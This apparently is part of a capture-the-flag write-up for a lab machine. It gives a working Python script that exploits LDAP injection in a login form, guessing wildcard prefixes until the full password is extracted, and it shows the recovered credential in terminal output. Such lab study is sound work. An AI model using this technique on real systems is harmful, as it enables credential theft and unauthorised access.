Ghost_Password_Mining

Vulnerability

---

Reviewing the LDAP Injection technique used to bypass authentication, the asterisk(*) appears to function as a wildcard bit Since the backend does not have any input validation in place, this vulnerability can be further leveraged to mine passwords of every single domain accounts

Exploit

---

#!/usr/bin/python3
 
import requests
import string
 
url = 'http://intranet.ghost.htb:8008/login'
 
headers = {
    'Host': 'intranet.ghost.htb:8008',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Next-Action': 'c471eb076ccac91d6f828b671795550fd5925940',
    'Connection': 'keep-alive'
}
 
ldap_username = input("Enter the LDAP username: ")
 
passw = ""
while True:
    for char in string.ascii_lowercase + string.digits:
        files = {
            '1_ldap-username': (None, ldap_username),
            '1_ldap-secret': (None, f'{passw}{char}*'),
            '0': (None, '[{},"$K1"]')
        }
        res = requests.post(url, headers=headers, files=files)
        if res.status_code == 303:
            passw += char
            print(f"Passwd: {passw}")
            break
    else:
        break
print(f"Final password: {passw}")

A simple python script to iterate through all the ASCII characters followed by the asterisk sign(*)

Exploitation

---

┌──(kali㉿kali)-[~/archive/htb/labs/ghost]
└─$ python3 password_mining.py
Enter the LDAP username: gitea_temp_principal
Passwd: s
Passwd: sz
Passwd: szr
Passwd: szrr
Passwd: szrr8
Passwd: szrr8k
Passwd: szrr8kp
Passwd: szrr8kpc
Passwd: szrr8kpc3
Passwd: szrr8kpc3z
Passwd: szrr8kpc3z6
Passwd: szrr8kpc3z6o
Passwd: szrr8kpc3z6on
Passwd: szrr8kpc3z6onl
Passwd: szrr8kpc3z6onlq
Passwd: szrr8kpc3z6onlqf
Final password: szrr8kpc3z6onlqf

gitea_temp_principal:szrr8kpc3z6onlqf